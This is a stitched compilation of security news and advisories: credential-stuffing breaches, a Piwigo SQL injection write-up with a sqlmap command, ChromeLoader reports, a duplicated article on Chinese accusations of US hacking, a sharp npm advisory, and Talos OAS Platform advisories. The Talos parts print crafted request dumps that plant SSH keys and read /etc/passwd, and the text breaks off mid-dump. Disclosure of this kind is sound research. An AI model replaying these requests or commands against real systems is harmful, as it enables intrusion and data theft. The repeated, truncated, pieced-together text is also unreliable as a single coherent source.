Credential-stuffing attacks against online accounts are still popular, and they work thanks to continuing password reuse.

It has been a week of data breach news, with General Motors, Chicago Public Schools, and wedding-planner startup Zola all reeling from the exposure of customers' personal information. In the latter's case, customers were also riffed for stored funds and suffered fraudulent payment-card charges.

Credential stuffing was to blame in two of the incidents. In credential stuffing, attackers use automated scripts to try high volumes of stolen username and password combinations against online accounts in an effort to take them over. The stolen credentials are usually taken from data breaches of other sites — cybercriminals bank on password reuse and the use of common or easy-to-guess passwords, like “123456.”

Once in, cybercriminals can use the compromised accounts for various purposes: as a pivot point to penetrate deeper into a victim's machine and network; to drain accounts of sensitive information (or monetary value); and, if it's an email account, to impersonate the victim in attacks on others.

And such attacks are costly: The Ponemon Institute's Cost of Credential Stuffing report found that businesses lose an average of $6 million per year to credential stuffing in the form of application downtime, lost customers, and increased IT costs.

They're also wildly common. According to recent PerimeterX data, malicious login attempts out of total logins trended upward during 2021, reaching a staggering 93.8% of all login attempts in August, which was an 8% increase on the 2020 peak.

Verizon's 2022 Data Breach Investigations Report (DBIR), released this week, noted that the use of stolen credentials for kicking off data breaches is the top attack vector, accounting for around 42% of all of the breaches analyzed by the carrier.

**General Motors Drives into Trouble**  

GM has alerted customers that a successful credential-stuffing attack last month on its customers resulted in a raft of account compromises. The incident exposed personal information for customers and allowed hackers to fraudulently redeem rewards points for gift cards.

The customer data involved lends itself to a veritable cornucopia of follow-on attacks, including convincing social-engineering efforts, spoofing attacks, and, alarmingly, potential physical threats at the extreme end of the spectrum. The info included first and last name, personal email address, personal address, username and phone number for registered family members tied to an account, last known and saved favorite location information, your currently subscribed OnStar package (if applicable), family members' avatars and photos (if uploaded), profile picture, search and destination information, and reward-card activity.

"Some may suggest that breaches that don't involve payment-card numbers or SSNs are not as serious, but other information (family member names, phone numbers, and addresses) is just as damaging as it will be used in future social engineering attacks and will forever place these people in danger," noted John Gunn, CEO at Token, via email. "How easy is it to change family member names, phone numbers, and addresses? This type of attack is eminently preventable simply with better multi-factor authentication."

GM is reinstating any lost loyalty points and forced a password reset for customers.

**Chicago Public Schools Face Student Exposure**

Also this week, news emerged of a wide-ranging data breach that involved the personal information of nearly 500,000 students in Chicago Public Schools (CPS), and more than 56,000 employees.

The information was stolen as part of a ransomware attack on one of the district's third-party technology suppliers, Battelle for Kids, which maintains a server used to store the CPS student and staff information. The data was for the 2015-2019 school years.

CPS issued a data-breach notification flagging the exposed information, which included name, date of birth, gender, grade level, school, and district and state student ID numbers, as well as information about the courses students took.

The exposed staff records included name, school employee ID number, CPS email address, and scores on tasks used to evaluate teachers during the time period, the district said.

Perhaps most notably, the breach occurred months ago, on Dec. 1, but Battelle for Kids didn't notify CPS until April 26. It took that long for the vendor to verify the authenticity of the breach and commission an independent forensic analysis, and for law enforcement authorities to investigate, CPS noted.

The data was old and there's no evidence that the ransomware gang has made a move to exploit the data, but students and staff should still be on the lookout for phishing efforts, the district warned. It's offering everyone involved a year of free credit monitoring in response to the incident.

"Ransomware attacks have become a growing threat to education centers across the United States," says Erfan Shadabi, cybersecurity expert with data security specialists Comforte AG. "Schools are becoming more dependent on a computing infrastructure to support their daily functions, and they also hold a vast amount of sensitive information. School districts and universities need to understand that they are high-profile targets, and they need to assume that a cyberattack is imminent."

**Zola Customer Accounts Hijacked**

Wedding-planning site Zola has discovered that 3,000 customer accounts were compromised in an apparent brute-force or credential-stuffing attack on its customers.

The site allows couples to create wedding destination websites, build gift registries, and access a variety of financial tools. Over the weekend, customers began reporting on Reddit that their accounts had been hijacked, with the cyberattackers making off with stolen funds or racking up fraudulent credit-card charges. Zola didn't reveal how high the losses have mounted.

TechCrunch, which first reported the breach, said that it saw posts on a Dark Web Telegram channel from hackers, who swapped tips, posted screenshots of pwned accounts, and discussed ordering gift cards using the credit card on file with Zola.

"Credential stuffing attacks continue to fuel the web-attack lifecycle, potentially using these stolen user credentials on other e-commerce sites," said Uriel Maimon, vice president of emerging products at PerimeterX, via email. "We can expect that these credentials will soon be tested on other apps that we use daily to power our lives. The responsibility lies on app providers and website owners to make it difficult and expensive for cybercriminals to use the information in order to disrupt the cycle of attacks. This means stopping the theft, validation, and fraudulent use of account and identity information everywhere along a consumer's digital journey."

He added that that one way to do that is by tracking behavioral and forensics signals of users logging in, in order to differentiate between real users and attackers.

Big Cyber Hits on GM, Chicago Public Schools, & Zola Showcase the Password Problem

Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter.

The following is the detail about this vulnerability I found in Piwigo 11.5.0:  
First, visit URL/admin.php and login, then click Album-Move. On this page, click ORDER on the right side.

  
Then we can see:

  
Select default, use Burpsuite during clicking APPLY.

  
Then in sqlmap:

python sqlmap.py -r post.txt -o --dbms=MySQL  

See admin\\cat\_move.php:

Here there seems to be no confirmation of the legitimacy of the parameter $\_POST\[id\]. And other parameters are legal so query is done.

Here is the manual injection test:

(Load successfully after sleeping 5 seconds)  

Thanks for reading!

CVE-2021-40317: [11.5.0]SQL Injection Vulnerability · Issue #1470 · Piwigo/Piwigo

ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?
The post ChromeLoader targets Chrome Browser users with malicious ISO files appeared first on Malwarebytes Labs.

If you’re on the hunt for cracked software or games, be warned. Rogue ISO archive files are looking to infect your systems with ChromeLoader. If you think campaigns such as this only target Windows users, you’d sadly be very much mistaken. The attack sucks in several operating systems and even uses mobiles as bait to draw in additional victims.

**Of PowerShells and ISOs**

An optimal disc image (ISO) is a disk image containing everything written to an optical disc. If someone copied a DVD or CD-ROM, they may end up with an ISO. With the right software, these files can be mounted and read as if the device was reading from a physical disc.

If a malware author claims to be offering cracked or pirated versions of games or software, an ISO is frequently what’s on offer. They may be promoted on social media, video sites, game crack portals, or torrents. Sadly for would-be file downloaders, they’re frequently booby trapped with malware.

PowerShell is a way to automate tasks and comes complete with  a command line interface. It can be used by infection files to execute specific commands and get the infection ball rolling. This ChromeLoader attack combines both Powershell and ISOs to compromise systems.

**How does ChromeLoader infect a device?**

The flow is as follows:

1.  Bogus files are promoted on Twitter and other services. Some victims are simply grabbing the infection from rogue sites and/or torrents.
2.  Some social media posts promote supposedly cracked Android games via QR codes which direct would-be gamers to rogue websites.
3.  Double clicking the ISO file mounts it as a virtual CD-ROM. The executable in the ISO claims to be the content the victim was originally looking for.
4.  ChromeLoader makes use of a PowerShell command to load in a Chrome extension from a remote resource. PowerShell then removes the scheduled task and the victim is none the wiser that their browser has been compromised. At this point, search results cannot be trusted and bogus entries will be displayed to the user.
5.  As BleepingComputer notes, users of macOS are also at risk from this attack. Instead of ISO, attackers use DMG (Apple Disk Image) files, which is a more common format on that OS.

**Tips to avoid ChromeLoader**

1.  Searching for cracked games and software is a very risky business. Many sites promoting malware masquerading as “genuine” crack portals are hard to spot. If you’re downloading a torrent, you may well be rolling dice with regard to the digital health of your devices. Deep sales on games and products are fairly common. Unless it’s a brand new title, it may be worth waiting for a product-centric sale.
2.  In Chrome, Click the **More** icon, then **More Tools** -> **Extensions**. From there, you can see what’s installed, what is active or disabled, along with additional information about all extensions present. Google also has advice for resetting browser settings and additional clean-up methods.
3.  Keeping your security software up to date and running regular scans helps prevent this kind of attack. You should also always scan a downloaded file before making use of it.
4.  Keep in mind that rogue extensions don’t just come from bad websites or rogue downloads. The Chrome web store itself has been known to play host to bad files. Always check reviews, developer information, extension permissions and anything else of note before installing a new extension to your browser.

ChromeLoader targets Chrome Browser users with malicious ISO files

A malvertising threat is witnessing a new surge in activity since its emergence earlier this year.
Dubbed ChromeLoader, the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report.
ChromeLoader is a rogue Chrome browser extension and is typically

A malvertising threat is witnessing a new surge in activity since its emergence earlier this year.

Dubbed **ChromeLoader**, the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report.

ChromeLoader is a rogue Chrome browser extension and is typically distributed in the form of ISO files via pay-per-install sites and baited social media posts that advertise QR codes to cracked video games and pirated movies.

While it primarily functions by hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site, it's also notable for its use of PowerShell to inject itself into the browser and get the extension added.

The malware, also known as Choziosi Loader, was first documented by G DATA earlier this February.

"For now the only purpose is getting revenue via unsolicited advertisements and search engine hijacking," G DATA's Karsten Hahn said. "But loaders often do not stick to one payload in the long run and malware authors improve their projects over time."

Another trick up ChromeLoader's sleeve is its ability to redirect victims from the Chrome extensions page ("chrome://extensions") should they attempt to remove the add-on.

Furthermore, researchers have detected a macOS version of the malware that works against both Chrome and Safari browsers, effectively turning ChromeLoader into a cross-platform threat.

"If applied to a higher-impact threat — such as a credential harvester or spyware — this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user's browser sessions," Russell noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Warn of Rise in ChromeLoader Malware Hijacking Users' Browsers

The Chinese government recently began saber-rattling about American cyberespionage. The catch? It’s all old news.

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from companies like pharmaceutical and video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown more brazen, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, China’s Foreign Ministry and the country’s cybersecurity firms have increasingly been calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at the Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the _Global Times_ reported on further National Computer Virus Emergency Response Center findings about HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activities.)

Ben Read, director of cyberespionage analysis at the US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. A Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cybertheft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues, including concerns about the telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, head of intelligence at the US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

The Mystery of China’s Sudden Warnings About US Hackers

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from pharmaceutical companies to video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown in aggression, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, there has been a marked uptick in China’s Foreign Ministry and the country’s cybersecurity firms calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the Global Times reported on further National Computer Virus Emergency Response Center findings around HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer a secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activity.)

Ben Read, director of cyberespionage analysis at US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. Although a Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cyber theft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues including concerns of telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, vice president of intelligence at US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

sharp is an application for Node.js image processing. Prior to version 0.30.5, there is a possible vulnerability in logic that is run only at `npm install` time when installing versions of `sharp` prior to the latest v0.30.5. If an attacker has the ability to set the value of the `PKG_CONFIG_PATH` environment variable in a build environment then they might be able to use this to inject an arbitrary command at `npm install` time. This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. This problem is fixed in version 0.30.5.

There's a possible vulnerability in logic that is run only at npm install time when installing versions of sharp prior to the latest v0.30.5.

This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. However, out of an abundance of caution, I've created this advisory.

If an attacker has the ability to set the value of the PKG_CONFIG_PATH environment variable in a build environment then they might be able to use this to inject an arbitrary command at npm install time.

I've used the Common Vulnerability Scoring System (CVSS) calculator to determine the maximum possible impact, which suggests a "medium" score of 5.9, but for most people the real impact will be dealing with the noise from automated security tooling that this advisory will bring.

AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:R/MS:X/MC:X/MI:X/MA:X

This problem was fixed in commit a6aeef6 and published as part of sharp v0.30.5.

Thank you very much to @dwisiswant0 for the responsible disclosure.

Remember: if an attacker has control over environment variables in your build environment then you have a bigger problem to deal with than this issue.

CVE-2022-29256

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to upload an arbitrary file to any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

Once the required Security Group and User Account credentials have been obtained, a file of choice can be uploaded to the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   02 b6 00 00 40 00 40 06 a2 4f c0 a8 0a 6a c0 a8   ....@.@..O...j..
    0020   0a 38 c4 ea e5 67 18 9e 24 8a 19 e0 9f df 80 18   .8...g..$.......
    0030   08 0a b5 4d 00 00 01 01 08 0a 36 5a a0 6d d6 19   ...M......6Z.m..
    0040   2e 41 00 00 00 00 00 d0 83 40 00 01 00 00 00 ff   .A.......@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 04 00 00 00 08 08 01 00   ................
    00f0   00 00 06 08 00 00 00 13 2f 68 6f 6d 65 2f 6f 61   ......../home/oa
    0100   73 75 73 65 72 2f 2e 73 73 68 2f 06 09 00 00 00   suser/.ssh/.....
    

When a successful SecureTransferFiles command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

With file upload functionality successful, various approaches can be taken to get access to the system. The proof-of-concept here uploads a new authorized_keys file to the oasuser’s .ssh directory, after which it is possible to gain access to the system via a ssh command like the following: ssh -i id_rsa oasuser@192.168.1.10

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Vendor Response**

released as version 16.00.0113

https://openautomationsoftware.com/downloads/

**Timeline**

2022-03-15 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26082: TALOS-2022-1493 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to read an arbitrary file at any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   00 ff 00 00 40 00 40 06 a4 06 c0 a8 0a 6a c0 a8   ....@.@......j..
    0020   0a 38 c4 e4 e5 67 c9 f5 cd 34 94 6c 24 2e 80 18   .8...g...4.l$...
    0030   08 0a 21 f0 00 00 01 01 08 0a bb 15 e8 9d d6 18   ..!.............
    0040   2b 37 00 00 00 00 00 60 68 40 00 01 00 00 00 ff   +7.....`h@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 03 00 00 00 08 08 02 00   ................
    00f0   00 00 06 08 00 00 00 03 6f 75 74 06 09 00 00 00   ........out.....
    0100   0b 2f 65 74 63 2f 70 61 73 73 77 64 0b            ./etc/passwd.
    

Once the required Security Group and User Account have been created, a file of choice can be read from the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. When a SecureTransferFiles command is successfully processed, the response will contain the contents of the requested file. This response resembles the following:

    0000   c4 b3 01 c3 ba c9 00 0c 29 5e b3 62 08 00 45 00   ........)^.b..E.
    0010   0a de 3b ca 40 00 40 06 5e 5d c0 a8 0a 38 c0 a8   ..;.@.@.^]...8..
